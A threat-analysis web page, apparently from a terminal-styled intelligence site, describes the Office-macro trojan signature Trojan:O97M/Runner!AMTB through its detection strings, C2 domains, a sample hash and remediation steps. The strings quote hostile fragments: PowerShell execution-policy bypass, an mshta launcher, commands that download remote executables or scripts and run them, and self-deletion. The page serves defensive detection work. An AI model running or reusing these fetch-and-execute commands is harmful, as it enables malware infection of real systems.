Trojan:O97M/Runner!AMTB - ThreatCheck.sh

user@threatcheck.sh ~ threat-analysis

bash

$ analyze-threat Trojan:O97M/Runner!AMTB

Trojan:O97M/Runner!AMTB - Windows Defender threat signature analysis

$ cat analysis.txt

=== THREAT ANALYSIS REPORT ===

Threat Name: Trojan:O97M/Runner!AMTB

Classification:

Type:Trojan

Platform:O97M

Family:Runner

Detection Type:Concrete

Known malware family with identified signatures

Suffix:!AMTB

Confidence:Very High

False-Positive Risk:Low

Concrete signature match: Trojan - Appears legitimate but performs malicious actions for O97M platform, family Runner

Summary:

Trojan:O97M/Runner!AMTB is a sophisticated trojan primarily leveraging Office macros (O97M) for initial execution. It establishes persistence, downloads additional malicious payloads from remote servers (e.g., mine.fortipower.com), and functions as a data stealer. The threat employs stealthy execution techniques using mshta.exe and powershell.exe with execution policy bypass to fully compromise the system and exfiltrate sensitive information.

Severity:

Critical

VDM Static Detection:

Relevant strings associated with this threat:
 - Global\GC_Controller (PEHSTR_EXT)
 - SOFTWARE\GigaClicks Crawler (PEHSTR_EXT)
 - %s/stat/uid/%s/sid/%d/a/%s/ (PEHSTR_EXT)
 - \gcc\Runner.exe (FILEPATH)
 - \gcc\Uninstall.exe (FILEPATH)
 - \gcc\Controller.exe (FILEPATH)
 - \gcc\GccProfiler.exe (FILEPATH)
 - \GC\Profiles (FOLDERNAME)
 - StealerRunner (PEHSTR_EXT)
 - start mshta vbscript:createobject("wscript.shell").run("""C:\kl\ccc.cmd"" h",0)(window.close)&&exit (PEHSTR_EXT)
 - START http://www. (PEHSTR_EXT)
 - c:\kl\ccc.cmd (PEHSTR_EXT)
 - C:\kl\ddd.cmd (PEHSTR_EXT)
 - cmd.exe /c copy (PEHSTR_EXT)
 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run (PEHSTR_EXT)
 - ShellRunner.Run "cmd /c powershell -ep bypass -c (MACROHSTR_EXT)
 - $stream=$webClient.OpenRead('http://mine.fortipower.com/shload.jpg'); (MACROHSTR_EXT)
 - powershell.exe -W Hidden -Exec Bypass -Command cd /; (MACROHSTR_EXT)
 - You are about to run a demo attack scenario provided as part of the Microsoft WDATP Preview/Trial program (MACROHSTR_EXT)
 - #RedFlare/rat/comms.protectedChannel (PEHSTR)
 - ,RedFlare/rat/modules/filemgmt.downloadRunner (PEHSTR)
 - %RedFlare/sandals/server.readInRequest (PEHSTR)
 - o.Language = "JScript" (MACROHSTR_EXT)
 - .Run ("Runner") (MACROHSTR_EXT)
 - .jpg") (MACROHSTR_EXT)
 - = "C:\users\Public\" + "xfe.png" (MACROHSTR_EXT)
 - & ListBox1.List(3) (MACROHSTR_EXT)
 - ShellRunner.Run VarExQuery & RefArray (MACROHSTR_EXT)
 - ListBox1.AddItem (CommandButton1.Tag) (MACROHSTR_EXT)
 - ListBox1.AddItem (CheckBox1.Tag) (MACROHSTR_EXT)
 - ListBox1.AddItem (Image1.ControlTipText) (MACROHSTR_EXT)
 - PAGE_EXECUTE_READWRITE (PEHSTR_EXT)
 - \PoshC2_DLLS\DotNet2JS\DotNet2JS\ (PEHSTR_EXT)
 - \PoshC2_DLLs\SharpRunner\SharpRunner\ (PEHSTR_EXT)
 - x='WinHttp'; (PEHSTR_EXT)
 - x=new ActiveXObject(x+'.'+x+'Request.5.1'); (PEHSTR_EXT)
 - x.open('GET',y[1]+'&a='+escape(window.navigator.userAgent),!1) (PEHSTR_EXT)
 - x.send(); (PEHSTR_EXT)
 - y='ipt.S'; (PEHSTR_EXT)
 - new ActiveXObject('WScr'+y+'hell').Run(unescape(unescape(x.responseText)),0,!2) (PEHSTR_EXT)
 - Windows Update Runner (PEHSTR)
 - .projects\unmanagedpowershell\powershellrunner\ (PEHSTR)
 - PowerShellRunner.dll (PEHSTR)
 - PowerShellRunner (PEHSTR)
 - BatchRunner.Propertie (PEHSTR_EXT)
 - RemoteRunnerAPC (PEHSTR_EXT)
 - /c ping -n 20 127.0.0.1 > nul & del (PEHSTR_EXT)
 - shellcode.dll (PEHSTR_EXT)
 - Failed to load shellcode.dll (PEHSTR_EXT)
 - ShellRunnerNuma (PEHSTR_EXT)
 - C:\Users\yukan\source\repos\ShellRunner\ShellRunnerNuma\obj\x64\Debug\ShellRunnerNuma.pdb (PEHSTR_EXT)
 - 10SelfDelBat (PEHSTR_EXT)
 - RemoteRunner (PEHSTR_EXT)
 - powershell wget https://FileUploads--asphalt.repl.co/uploads/cwod/malware.exe -outfile "malware.exe" (PEHSTR_EXT)
 - powershell wget https://FileUploads--asphalt.repl.co/uploads/cwod/coronayeahoofurpcwilldie.exe -outfile "coronayeahoofurpcwilldie.exe" (PEHSTR_EXT)
 - powershell wget https://FileUploads--asphalt.repl.co/uploads/cwod/736C6F77646F776E.exe -outfile "736C6F77646F776E.exe" (PEHSTR_EXT)
 - start malware.exe (PEHSTR_EXT)
 - Executing shellcode (PEHSTR_EXT)
 - Shellcode execution complete (PEHSTR_EXT)
 - ShellcodeRunner_evasion.pdb (PEHSTR_EXT)
 - ://jcxjg.fun/test/de_shellcode (PEHSTR_EXT)
 - Shellcode executed (PEHSTR_EXT)
 - Runner (PEHSTR_EXT)
 - C:\Users\39392\OneDrive\Desktop\Test1\x64\Debug\Test1.pdb (PEHSTR_EXT)
 - App_global.asax.nvqtah6k (PEHSTR_EXT)
 - cmd /c start /min C:\Documents and Settings\ (PEHSTR_EXT)
 - \down.exe (PEHSTR_EXT)
 - unknowndll.pdb (PEHSTR_EXT)
 - Name Setup: Completed (PEHSTR_EXT)
 - D3Ext/Hooka (PEHSTR)
 - $Shellcode should have been executed! (PEHSTR)
 - hll Ah32.dhuser0 (PEHSTR_EXT)
 - BruteRunner (PEHSTR_EXT)
 - BtrMEduPNfN.(*endpointList).StateTypeName (PEHSTR_EXT)
 - RVirus.pdb (PEHSTR_EXT)
 - .win Tools.exe (PEHSTR_EXT)
 - .msvcp120.dll (PEHSTR_EXT)
 - .msvcr120.dll (PEHSTR_EXT)
 - .w10.rar (PEHSTR_EXT)
 - .w7.rar (PEHSTR_EXT)
 - encoding/hex.DecodeString (PEHSTR_EXT)
 - encoding/base64.(*Encoding).Decode (PEHSTR_EXT)
 - main.xorDecrypt (PEHSTR_EXT)
 - main.xorEncrypt (PEHSTR_EXT)
 - main.generateKey (PEHSTR_EXT)
 - main.base64Decode (PEHSTR_EXT)
 - main.decryptAES (PEHSTR_EXT)
 - main.downloadData (PEHSTR_EXT)
 - net/http.(*Client).Get (PEHSTR_EXT)
 - encoding/base64.init (PEHSTR_EXT)
 - crypto/subtle.xorBytes (PEHSTR_EXT)
 - build/loader/temp/temp.go (PEHSTR_EXT)
 - net/http/socks_bundle.go (PEHSTR_EXT)
 - encoding/hex/hex.go (PEHSTR_EXT)
 - Spotifys.exe (PEHSTR_EXT)
 - Langfang Alkem Material Technology Co., Ltd.0 (PEHSTR_EXT)
 - main.PEB (PEHSTR_EXT)
 - main.IMAGE_DOS_HEADER (PEHSTR_EXT)
 - main.IMAGE_FILE_HEADER (PEHSTR_EXT)
 - main.IMAGE_OPTIONAL_HEADER32 (PEHSTR_EXT)
 - main.IMAGE_OPTIONAL_HEADER64 (PEHSTR_EXT)
 - main.PROCESS_BASIC_INFORMATION (PEHSTR_EXT)
 - syscall.RawSockaddrAny (PEHSTR_EXT)
 - pe.RelocEntry (PEHSTR_EXT)
 - encoding/gob/encoder.go (PEHSTR_EXT)
 - github.com/sethgrid/pester (PEHSTR_EXT)
 - text/template/exec.go (PEHSTR_EXT)
 - vendor/golang.org/x/net/http/httpproxy/proxy.go (PEHSTR_EXT)
 - net/http/cookie.go (PEHSTR_EXT)
 - net/url.(*URL).Hostname (PEHSTR_EXT)
 - net/url.(*URL).Port (PEHSTR_EXT)
 - .text (PEHSTR_EXT)
 - `.rdata (PEHSTR_EXT)
 - @.data (PEHSTR_EXT)
 - .pdata (PEHSTR_EXT)
 - main.AesDecrypt (PEHSTR_EXT)
 - main.HexStrToBytes (PEHSTR_EXT)
 - main.isNonChinese (PEHSTR_EXT)
 - main.isNonChinese.deferwrap1 (PEHSTR_EXT)
 - main.isPythonInCDrive (PEHSTR_EXT)
 - main.main (PEHSTR_EXT)
 - main.isCPULow (PEHSTR_EXT)
 - main.HideConsoleWindow (PEHSTR_EXT)
 - main.HexParseKey (PEHSTR_EXT)
 - /ShellCode/ShellCode (PEHSTR_EXT)
 - LazyDLL (PEHSTR_EXT)
 - \maldev\!code-section\!Shellcode\Shellcode-test\x64\Release\Shellcode-test.pdb (PEHSTR_EXT)
 - \maldev\!code-section\!Shellcode\Shellcode-obfuscated\x64\Release\Shellcode-obfuscated.pdb (PEHSTR_EXT)
 - \maldev\code-section\fud-cmd\x64\Release\fud-cmd.pdb (PEHSTR_EXT)
 - \maldev\!code-section\fud-cmd\x64\Release\fud-cmd.pdb (PEHSTR_EXT)
 - curl_easy_perform cannot be executed if the CURL handle is used in a MultiPerform. (PEHSTR_EXT)
 - https:// (PEHSTR_EXT)
 - ?h=relay.vahelps.top&amp;p=8041& (PEHSTR_EXT)
 - ?h=relay.vahelps.top&amp;p=443& (PEHSTR_EXT)
 - DotNetRunner.pdb (PEHSTR_EXT)
 - ClickOnceRunner.pdb (PEHSTR_EXT)
 - ScreenConnect.ClientInstallerRunner.pdb (PEHSTR_EXT)
 - %s\sys_check_%lu.tmp (PEHSTR_EXT)
 - "lib.min.js"; (PEHSTR_EXT)
 -         using (FileStream fs = new FileStream(path, FileMode.Open, FileAccess.Read)) (PEHSTR_EXT)
 - len = (uint)fs.Length / 4 - 256; (PEHSTR_EXT)
 -                 if (fs.Read(buffer, 0, 4) != 4) (PEHSTR_EXT)
 - .WriteByte(a, pos, (byte)((map[key] + 256 - (pos % 256)) % 256)) (PEHSTR_EXT)
 - C:\Users\jmorgan\Source\cwcontrol\Misc\Bootstrapper\Release\ClickOnceRunner.pdb (PEHSTR_EXT)
 - C:\Users\jmorgan\Source\cwcontrol\Custom\DotNetRunner\Release\DotNetRunner.pdb (PEHSTR_EXT)
 - .innocreed.com (PEHSTR_EXT)
 - .controlhub.es (PEHSTR_EXT)
 - .ratoscreenco.com (PEHSTR_EXT)
 - .screensconnectpro.com (PEHSTR_EXT)
 - slplegalfinance.com (PEHSTR_EXT)
 - .filesdonwloads.com (PEHSTR_EXT)
 - wizz.infinitycloud.org (PEHSTR_EXT)
 - llkt501.ddns.net (PEHSTR_EXT)
 - yourrldns22.hopto.org (PEHSTR_EXT)
 - wk36back966.site (PEHSTR_EXT)
 - void.corsazone.com (PEHSTR_EXT)
 - relay.ziadpaneel.com (PEHSTR_EXT)
 - mail.securedocumentfiledownload.com (PEHSTR_EXT)
 - dual.saltuta.com (PEHSTR_EXT)
 - .organzoperate.com (PEHSTR_EXT)
 - .ephelp.site (PEHSTR_EXT)
 - dcontrol.guidzin.com (PEHSTR_EXT)
 - docs.viewyourstatementonline.com (PEHSTR_EXT)
 - Ws2_32.dH (PEHSTR_EXT)
 - Release\ClickOnceRunner.pdb (PEHSTR_EXT)
 - Release\DotNetRunner.pdb (PEHSTR_EXT)
 - relay.magaretcap.com (PEHSTR_EXT)
 - relay.shipperzone.online (PEHSTR_EXT)
 - fmt2as.ddns.net (PEHSTR_EXT)
 - app.ratoscreensell.com (PEHSTR_EXT)
 - relay.ale3rt.in (PEHSTR_EXT)
 - microsoffeedd4ackapiz.enterprisesolutions.su (PEHSTR_EXT)
 - .putinswin.es (PEHSTR_EXT)
 - brovanti.de (PEHSTR_EXT)
 - .ratoscbom.com (PEHSTR_EXT)
 - pulseriseglobal.com (PEHSTR_EXT)
 - .myedelta.de (PEHSTR_EXT)
 - kingcardano.io (PEHSTR_EXT)
 - .viewyourstatementonline.com (PEHSTR_EXT)
 - preyinthewild.online (PEHSTR_EXT)
 - download.e-statement.estate (PEHSTR_EXT)
 - hp.noleggiodisciza.com (PEHSTR_EXT)
 - Videos\login.bin (PEHSTR_EXT)
 - WWE_uninstall.exe (PEHSTR_EXT)
 - http://install-apps.com/s2s_install.exe (PEHSTR_EXT)
 - WBE_uninstall.exe (PEHSTR_EXT)
 - .dll (PEHSTR_EXT)
 - wajam_goblin.pdb (PEHSTR_EXT)
 - wajam_goblin_64.pdb (PEHSTR_EXT)
 - D:\jenkins\workspace\stable- (PEHSTR_EXT)
 - \src\http_interception\ (PEHSTR_EXT)
 - 0-9_.pdb (PEHSTR_EXT)
 - <script data-type="injected" src="%1%%2%%3%%4%"></script> (PEHSTR_EXT)
 - AVquic_request_parser@http_parsing@@ (PEHSTR_EXT)
 - folder of wajam dll (PEHSTR_EXT)
 - path to patch.zip (PEHSTR_EXT)
 - inject dll into target process (PEHSTR_EXT)
 - \src\Release\wajam.pdb (PEHSTR_EXT)
 - D:\jenkins\workspace\moti- (PEHSTR_EXT)
 - \src\ServiceRunner\ (PEHSTR_EXT)
 - .?AVAsmHelperBase@blackbone@@ (PEHSTR_EXT)
 - .?AV?$_Ref_count_del@PAUHINSTANCE__@@V (PEHSTR_EXT)
 - \src\x64\Release\wajam_64.pdb (PEHSTR_EXT)
 - !#HSTR:StringCodeForMshta.A!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForHooking.C!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForHooking.D!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForHooking.L!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForHooking.O!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForRegsvr32.A!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForRundll32.A!pli (PEHSTR_EXT)
 - rundll32 (PEHSTR_EXT)
 - !#HSTR:StringCodeForBITSJobs.A!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForPowerShell.G!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForScheduledTask.A!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForDataEncoding.D!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForHooking.J!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForHooking.K!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForRemoteFileCopy.B!pli (PEHSTR_EXT)
 - !#HSTR:ExecutionGuardrails (PEHSTR_EXT)
 - !#HSTR:StringCodeForFileDeletion.A!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForHooking.M!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForNetshHelperDLL.A!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForRemoteServices.A!pli (PEHSTR_EXT)

Known malware which is associated with this threat:

421f7bdc183b51435cf834c6a2841491e2a9d2246826bb56424d7c42c1632e25

16/01/2026

→VirusTotal ↓Download Sample

Remediation Steps:

Immediately isolate the infected host. Perform a full system scan, meticulously remove all associated malicious files (e.g., in \gcc, c:\kl), and registry persistence entries (e.g., HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run). Block associated C2 domains (e.g., mine.fortipower.com) at the network perimeter and investigate for any further compromise or data exfiltration.

=== END REPORT ===

$ reanalyze-threat

This analysis was last updated on 16/01/2026. Do you want to analyze it again?

$ ls available-commands/

→ cd /home

user@threatcheck.sh:~$ ▊

Trojan:O97M/Runner!AMTB - Windows Defender Threat Analysis